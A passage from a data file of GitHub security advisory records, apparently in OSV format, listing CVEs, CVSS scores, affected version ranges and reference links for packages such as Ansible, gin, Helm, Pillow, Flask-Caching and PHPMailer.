Ansible. Two random password lookups of the same length generate the equal value as the template caching action for the same file since no re-evaluation happens. The highest threat from this vulnerability would be that all passwords are exposed at once for the file. This flaw affects Ansible Engine versions before 2.9.6.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10729'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/issues/34144'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/67429/'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1831089'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/blob/v2.9.6/changelogs/CHANGELOG-v2.9.rst'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4950'}]","{'cwe_ids': ['CWE-330'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T19:55:24Z', 'nvd_published_at': '2021-05-27T19:15:00Z'}" +1.4.0,GHSA-h395-qcrw-5vmq,2023-08-29T19:56:23Z,2021-06-23T17:53:21Z,,['CVE-2020-28483'],Inconsistent Interpretation of HTTP Requests in github.com/gin-gonic/gin,"When gin is exposed directly to the internet, a client's IP can be spoofed by setting the X-Forwarded-For header. This affects all versions of package github.com/gin-gonic/gin under 1.7.7. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/gin-gonic/gin'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28483'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/issues/2232'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/issues/2473'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/issues/2862'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/pull/2474#23issuecomment-729696437'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/pull/2632'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/pull/2675'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/pull/2844'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/pull/2844/files#diff-e6ce689a25eaef174c2dd51fe869fabbe04a6c6afbd416b23eda138c82e761baR1432'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/commit/03e5e05ae089bc989f1ca41841f05504d29e3fd9'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/commit/5929d521715610c9dd14898ebbe1d188d5de8937'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/commit/bfc8ca285eb46dad60e037d57c545cd260636711'}, {'type': 'PACKAGE', 'url': 'https://github.com/gin-gonic/gin'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/releases/tag/v1.7.0'}, {'type': 'WEB', 'url': 'https://github.com/gin-gonic/gin/releases/tag/v1.7.7'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0052'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGINGONICGIN-1041736'}]","{'cwe_ids': ['CWE-113', 'CWE-444'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T21:46:50Z', 'nvd_published_at': '2021-01-20T18:15:00Z'}" +1.4.0,GHSA-5mv9-q7fq-9394,2023-01-10T16:08:38Z,2021-06-01T21:21:01Z,,['CVE-2021-32635'],Action Commands (run/shell/exec) Against Library URIs Ignore Configured Remote Endpoint,"### Impact + +Due to incorrect use of a default URL, `singularity` action commands (`run`/`shell`/`exec`) specifying a container using a `library://` URI will always attempt to retrieve the container from the default remote endpoint (`cloud.sylabs.io`) rather than the configured remote endpoint. + +An attacker may be able to push a malicious container to the default remote endpoint with a URI that is identical to the URI used by a victim with a non-default remote endpoint, thus executing the malicious container. + +Only action commands (`run`/`shell`/`exec`) against `library://` URIs are affected. Other commands such as `pull` / `push` respect the configured remote endpoint. + +### Patches + +All users should upgrade to Singularity 3.7.4 or later. + +A patch was applied at: https://github.com/sylabs/singularity/commit/d52ae9d13979733c5e987a566fae59ed6f1bf796 + +### Workarounds + +Users who only interact with the default remote endpoint are not affected. + +Installations with an execution control list configured to restrict execution to containers signed with specific secure keys are not affected. + +### For more information + +General questions about the impact of the advisory can be asked in the: + +- [SingularityCE Slack Channel](https://singularityce.slack.com) +- [SingularityCE Mailing List](https://groups.google.com/g/singularity-ce) + +Any sensitive security concerns should be directed to: security@sylabs.io + +See our Security Policy here: https://sylabs.io/security-policy","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/sylabs/singularity'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.7.2'}, {'fixed': '3.7.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hpcng/singularity/security/advisories/GHSA-jq42-hfch-42f3'}, {'type': 'WEB', 'url': 'https://github.com/sylabs/singularity/security/advisories/GHSA-5mv9-q7fq-9394'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32635'}, {'type': 'WEB', 'url': 'https://github.com/sylabs/singularity/commit/d52ae9d13979733c5e987a566fae59ed6f1bf796'}, {'type': 'PACKAGE', 'url': 'https://github.com/sylabs/singularity'}, {'type': 'WEB', 'url': 'https://github.com/sylabs/singularity/releases/tag/v3.7.4'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-50'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T20:04:35Z', 'nvd_published_at': '2021-05-28T21:15:00Z'}" +1.4.0,GHSA-rm7f-mpcj-w4f6,2021-05-19T22:11:25Z,2021-06-16T17:17:24Z,,['CVE-2021-31164'],Command injection in Apache Unomi,Apache Unomi prior to version 1.5.5 allows CRLF log injection because of the lack of escaping in the log statements.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.unomi:unomi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31164'}, {'type': 'WEB', 'url': 'http://unomi.apache.org/security/cve-2021-31164'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T22:11:25Z', 'nvd_published_at': '2021-05-04T07:15:00Z'}" +1.4.0,GHSA-xfhh-g9f5-x4m4,2021-06-30T16:53:56Z,2021-06-30T16:51:31Z,,['CVE-2020-36049'],Resource exhaustion in socket.io-parser,The `socket.io-parser` npm package before versions 3.3.2 and 3.4.1 allows attackers to cause a denial of service (memory consumption) via a large packet because a concatenation approach is used.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'socket.io-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'socket.io-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.4.0'}, {'fixed': '3.4.1'}]}], 'versions': ['3.4.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36049'}, {'type': 'WEB', 'url': 'https://github.com/socketio/socket.io-parser/commit/dcb942d24db97162ad16a67c2a0cf30875342d55'}, {'type': 'WEB', 'url': 'https://blog.caller.xyz/socketio-engineio-dos/'}, {'type': 'WEB', 'url': 'https://github.com/bcaller/kill-engine-io'}, {'type': 'WEB', 'url': 'https://github.com/socketio/socket.io-parser/releases/tag/3.3.2'}, {'type': 'WEB', 'url': 'https://github.com/socketio/socket.io-parser/releases/tag/3.4.1'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/socket.io-parser'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T23:06:09Z', 'nvd_published_at': '2021-01-08T00:15:00Z'}" +1.4.0,GHSA-h39g-q63v-4h9p,2022-06-01T20:15:30Z,2021-06-01T21:56:23Z,,['CVE-2021-33038'],Exposure of sensitive information to an unauthorized actor in HyperKitty,"An issue was discovered in management/commands/hyperkitty_import.py in HyperKitty prior to 1.3.5. When importing a private mailing list's archives, these archives are publicly visible for the duration of the import. For example, sensitive information might be available on the web for an hour during a large migration from Mailman 2 to Mailman 3.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'HyperKitty'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33038'}, {'type': 'PACKAGE', 'url': 'https://gitlab.com/mailman/hyperkitty'}, {'type': 'WEB', 'url': 'https://gitlab.com/mailman/hyperkitty/-/blob/master/doc/news.rst#L83-L87'}, {'type': 'WEB', 'url': 'https://gitlab.com/mailman/hyperkitty/-/commit/9025324597d60b2dff740e49b70b15589d6804fa'}, {'type': 'WEB', 'url': 'https://gitlab.com/mailman/hyperkitty/-/issues/380'}, {'type': 'WEB', 'url': 'https://techblog.wikimedia.org/2021/06/11/discovering-and-fixing-cve-2021-33038-in-mailman3/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4922'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T20:13:23Z', 'nvd_published_at': '2021-05-26T14:15:00Z'}" +1.4.0,GHSA-q5hq-fp76-qmrc,2021-09-15T18:31:36Z,2021-06-08T18:49:36Z,,['CVE-2021-28677'],Uncontrolled Resource Consumption in Pillow,"An issue was discovered in Pillow before 8.2.0. For EPS data, the readline implementation used in EPSImageFile has to deal with any combination of \r and \n as line endings. It used an accidentally quadratic method of accumulating lines while looking for a line ending. A malicious EPS file could use this to perform a DoS of Pillow in the open phase, before an image was accepted for opening.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28677'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/5377'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/07/msg00018.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQHA5HAIBOYI3R6HDWCLAGFTIQP767FL/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.2.0.html#cve-2021-28677-fix-eps-dos-on-open'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-03T21:33:17Z', 'nvd_published_at': '2021-06-02T16:15:00Z'}" +1.4.0,GHSA-cpgw-2wxr-pww3,2021-05-20T20:55:39Z,2021-06-29T18:32:39Z,,['CVE-2018-15178'],Open Redirect,"Open redirect vulnerability in Gogs before 0.12 allows remote attackers to redirect users to arbitrary websites and conduct phishing attacks via an initial /\ substring in the user/login redirect_to parameter, related to the function isValidRedirect in routes/user/auth.go.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'gogs.io/gogs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-15178'}, {'type': 'WEB', 'url': 'https://github.com/gogs/gogs/issues/5364'}, {'type': 'WEB', 'url': 'https://github.com/gogs/gogs/pull/5365'}, {'type': 'WEB', 'url': 'https://github.com/gogs/gogs/commit/1f247cf8139cb483276cd8dd06385a800ce9d4b2'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T20:55:39Z', 'nvd_published_at': None}" +1.4.0,GHSA-wm2m-xrrp-j74c,2021-05-14T21:29:08Z,2021-06-18T18:31:40Z,,['CVE-2020-7655'],HTTP Request Smuggling in netius,netius prior to 1.17.58 is vulnerable to HTTP Request Smuggling. HTTP pipelining issues and request smuggling attacks might be possible due to incorrect Transfer encoding header parsing which could allow for CL:TE or TE:TE attacks.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'netius'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.17.58'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7655'}, {'type': 'WEB', 'url': 'https://github.com/hivesolutions/netius/commit/9830881ef68328f8ea9c7901db1d11690677e7d1'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-NETIUS-569141'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-14T21:29:08Z', 'nvd_published_at': '2020-05-21T15:15:00Z'}" +1.4.0,GHSA-656c-6cxf-hvcv,2022-09-20T13:31:06Z,2021-06-18T18:33:40Z,,['CVE-2021-33026'],Deserialization of Untrusted Data in Flask-Caching,"Flask-Cache adds easy cache support to Flask. The Flask-Caching extension through 1.10.1 for Flask relies on Pickle for serialization, which may lead to remote code execution or local privilege escalation. If an attacker gains access to cache storage (e.g., filesystem, Memcached, Redis, etc.), they can construct a crafted payload, poison the cache, and execute Python code. + +However, this is not a high-severity issue, as for an attack like this to work, an attacker must: + +1. Be able to write arbitrary values to the cache +2. Be able to generate a cache key that will collide with a value being read by the application +3. Cause the application to read a maliciously-injected value + +Any situation where all 3 of those is true is a situation where the application has larger problems; for example, if someone's able to inject malicious cached rendered pages into a Flask app's cache, then they can make the website say literally anything they want, regardless of whether it involves the execution of remote code. Basically, the Pickle vulnerability follows from a website already being extremely vulnerable (due to conditions 1 and 2 being met).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Flask-Caching'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.10.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33026'}, {'type': 'WEB', 'url': 'https://github.com/pallets-eco/flask-caching/pull/209#issuecomment-1136397937'}, {'type': 'WEB', 'url': 'https://github.com/sh4nks/flask-caching/pull/209'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-656c-6cxf-hvcv'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/flask-caching/PYSEC-2021-13.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/sh4nks/flask-caching'}]","{'cwe_ids': ['CWE-269', 'CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T17:25:38Z', 'nvd_published_at': '2021-05-13T23:15:00Z'}" +1.4.0,GHSA-6m8p-x4qw-gh5j,2021-07-14T19:43:22Z,2021-06-09T17:34:09Z,,['CVE-2020-12690'],Insufficient Session Expiration in OpenStack Keystone,"An issue was discovered in OpenStack Keystone before 15.0.1, and 16.0.0. The list of roles provided for an OAuth1 access token is silently ignored. Thus, when an access token is used to request a keystone token, the keystone token contains every role assignment the creator had for the project. This results in the provided keystone token having more role assignments than the creator intended, possibly giving unintended escalated access.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'keystone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '15.0.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'keystone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '16.0.0.0rc1'}, {'fixed': '16.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12690'}, {'type': 'WEB', 'url': 'https://bugs.launchpad.net/keystone/+bug/1873290'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re4ffc55cd2f1b55a26e07c83b3c22c3fe4bae6054d000a57fb48d8c2@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.openstack.org/ossa/OSSA-2020-005.html'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4480-1/'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2020/05/06/6'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/05/07/3'}]","{'cwe_ids': ['CWE-613'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T21:08:40Z', 'nvd_published_at': '2020-05-07T00:15:00Z'}" +1.4.0,GHSA-56hp-xqp3-w2jf,2023-08-30T18:45:08Z,2021-06-23T18:14:15Z,,[],Helm passes repository credentials to alternate domain,"While working on the Helm source, a Helm core maintainer discovered a situation where the username and password credentials associated with a Helm repository could be passed on to another domain referenced by that Helm repository. + +### Impact + +The `index.yaml` within a Helm chart repository contains a reference where to get the chart archive for each version of a chart. The reference can be relative to the `index.yaml` file or a URL to location. The URL can point to any domain and this is a feature leveraged by Helm users. For example, an `index.yaml` file can be hosted on GitHub pages while the chart archives are hosted as GitHub releases. These are on different domain names and the `index.yaml` file points to the other domain. + +When a username and password were associated with a Helm repository the username and password were also passed on to other domains referenced in the `index.yaml` file. This occurred when Helm went to retrieve a specific chart archive on the other domain. + +### Patches + +This issue has been resolved in 3.6.1. + +There is a slight behavior change to credential handling with regard to repositories. Usernames and passwords are only passed to the URL location of the Helm repository by default. The username and password are scoped to the scheme, host, and port of the Helm repository. To pass the username and password to other domains Helm may encounter when it goes to retrieve a chart, the new `--pass-credentials` flag can be used. This flag restores the old behavior for a single repository as an opt-in behavior. + +### Workarounds + +If you use a username and password for a Helm repository you can audit the Helm repository in order to check for another domain being used that could have received the credentials. In the `index.yaml` file for that repository, look for another domain in the `urls` list for the chart versions. If there is another domain found and that chart version was pulled or installed the credentials would have been passed on. + +### For more information + +Helm's security policy is spelled out in detail in our [SECURITY](https://github.com/helm/community/blob/master/SECURITY.md) document. +",[],"[{'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm/v3'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/helm/helm/security/advisories/GHSA-56hp-xqp3-w2jf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32690'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/commit/61d8e8c4a6f95540c15c6a65f36a6dd0a45e7a2f'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-56hp-xqp3-w2jf'}, {'type': 'PACKAGE', 'url': 'https://github.com/helm/helm'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/releases/tag/v3.6.1'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0384'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-16T19:43:50Z', 'nvd_published_at': None}" +1.4.0,GHSA-gchq-9r68-6jwv,2023-05-24T14:30:40Z,2021-06-16T17:24:31Z,,['CVE-2021-21648'],Cross-Site Request Forgery in Jenkins Credentials Plugin,"Jenkins Credentials Plugin prior to 2.3.19, 2.3.15.1, 2.3.14.1, 2.3.13.1, 2.3.7.1, and 2.3.0.1 does not escape user-controlled information on a view it provides, resulting in a reflected cross-site scripting (XSS) vulnerability. + +Credentials Plugin 2.3.19, 2.3.15.1, 2.3.14.1, 2.3.13.1, 2.3.7.1, and 2.3.0.1 restricts the user-controlled information it provides to a safe subset.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:credentials'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.16'}, {'fixed': '2.3.19'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:credentials'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.15'}, {'fixed': '2.3.15.1'}]}], 'versions': ['2.3.15']}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:credentials'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.14'}, {'fixed': '2.3.14.1'}]}], 'versions': ['2.3.14']}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:credentials'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.8'}, {'fixed': '2.3.13.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:credentials'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.1'}, {'fixed': '2.3.7.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:credentials'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21648'}, {'type': 'WEB', 'url': 'https://github.com/CVEProject/cvelist/blob/2d78eb36f4d084db7fb35f1535d8d84fdcb7d859/2021/21xxx/CVE-2021-21648.json'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/credentials-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2021-05-11/#SECURITY-2349'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T19:18:23Z', 'nvd_published_at': '2021-05-11T15:15:00Z'}" +1.4.0,GHSA-m6gx-rhvj-fh52,2021-10-08T21:25:42Z,2021-06-29T21:13:54Z,,[],Denial of service in go-ethereum due to CVE-2020-28362,"### Impact +Versions of Geth built with Go `<1.15.5` or `<1.14.12` are most likely affected by a critical DoS-related security vulnerability. The golang team has registered the underlying flaw as ‘CVE-2020-28362’. + +We recommend all users to rebuild (ideally `v1.9.24`) with Go `1.15.5` or `1.14.12`, to avoid node crashes. Alternatively, if you are running binaries distributed via one of our official channels, we’re going to release `v1.9.24` ourselves built with Go `1.15.5`. + +### Patches +This is not an issue in go-ethereum, rebuilding an older version with Go `1.15.5` or `1.14.12` will suffice to address the vulnerability. + +### Workarounds +Rebuilding with Go `1.15.5` or `1.14.12` will suffice to address the vulnerability. + +### References +- https://blog.ethereum.org/2020/11/12/geth_security_release/ +- https://groups.google.com/g/golang-announce/c/NpBGTTmKzpM + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum) +* Email us at [security@ethereum.org](mailto:security@ethereum.org) +",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.24'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/security/advisories/GHSA-m6gx-rhvj-fh52'}, {'type': 'PACKAGE', 'url': 'https://github.com/ethereum/go-ethereum'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T21:49:12Z', 'nvd_published_at': None}" +1.4.0,GHSA-77mr-wc79-m8j3,2021-10-21T13:23:23Z,2021-06-22T15:18:02Z,,['CVE-2021-3603'],A validation function with the same name as a built-in validator can be called,"If a function is defined that has the same name as the default built-in email address validation scheme (`php`), it will be called in default configuration as when no validation scheme is provided, the default scheme's callable `php` was being called. If an attacker is able to inject such a function into the application (a much bigger issue), it will be called whenever an email address is validated, such as when calling `validateAddress()`. + +### Impact +Low impact – exploitation requires that an attacker can already inject code into an application, but it provides a trigger pathway. + +### Patches +This is patched in PHPMailer 6.5.0 by denying the use of simple strings as validator function names, which is a very minor BC break. + +### Workarounds +Inject your own email validator function. + +### References +Reported by [Vikrant Singh Chauhan](mailto:vi@hackberry.xyz) via [huntr.dev](https://www.huntr.dev/). +[CVE-2021-3603](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3603) + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer) +* [Email us](mailto:phpmailer@synchromedia.co.uk). +",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'phpmailer/phpmailer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-77mr-wc79-m8j3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3603'}, {'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/commit/45f3c18dc6a2de1cb1bf49b9b249a9ee36a5f7f3'}, {'type': 'PACKAGE', 'url': 'https://github.com/PHPMailer/PHPMailer'}, {'type': 'WEB', 'url': 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3603'}, {'type': 'WEB', 'url': 'https://www.huntr.dev/bounties/1-PHPMailer/PHPMailer/'}]","{'cwe_ids': ['CWE-74'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-06-16T19:49:12Z', 'nvd_published_at': '2021-06-17T12:15:00Z'}" +1.4.0,GHSA-f2rp-4rv7-fc95,2023-01-24T15:07:15Z,2021-06-10T15:54:43Z,,['CVE-2021-20259'],Exposure of Sensitive Information to an Unauthorized Actor in foreman_fog_proxmox,A flaw was found in the Foreman project. The Proxmox compute resource exposes the password through the API to an authenticated local attacker with view_hosts permission. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. Versions of foreman_fog_proxmox prior to 0.13.1 are affected.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'foreman_fog_proxmox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.13.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20259'}, {'type': 'WEB', 'url': 'https://github.com/theforeman/foreman_fog_proxmox/pull/184/commits/b7e910bf61563f5d447c71b1b41e2a373a794d7b'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1932144'}, {'type': 'PACKAGE', 'url': 'https://github.com/theforeman/foreman_fog_proxmox'}, {'type': 'WEB', 'url': 'https://github.com/theforeman/foreman_fog_proxmox/releases/tag/v0.13.1'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-10T14:58:17Z', 'nvd_published_at': '2021-06-07T21:15:00Z'}" +1.4.0,GHSA-p2c4-gxp4-j3xp,2022-05-04T03:11:25Z,2021-06-21T17:11:25Z,,['CVE-2021-34801'],Denial of service in Valine,"Valine is a fast, simple & powerful comment system. Valine 1.4.14 allows remote attackers to cause a denial of service (application outage) by supplying a ua (aka User-Agent) value that only specifies the product and version.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'valine'}, 'ranges': 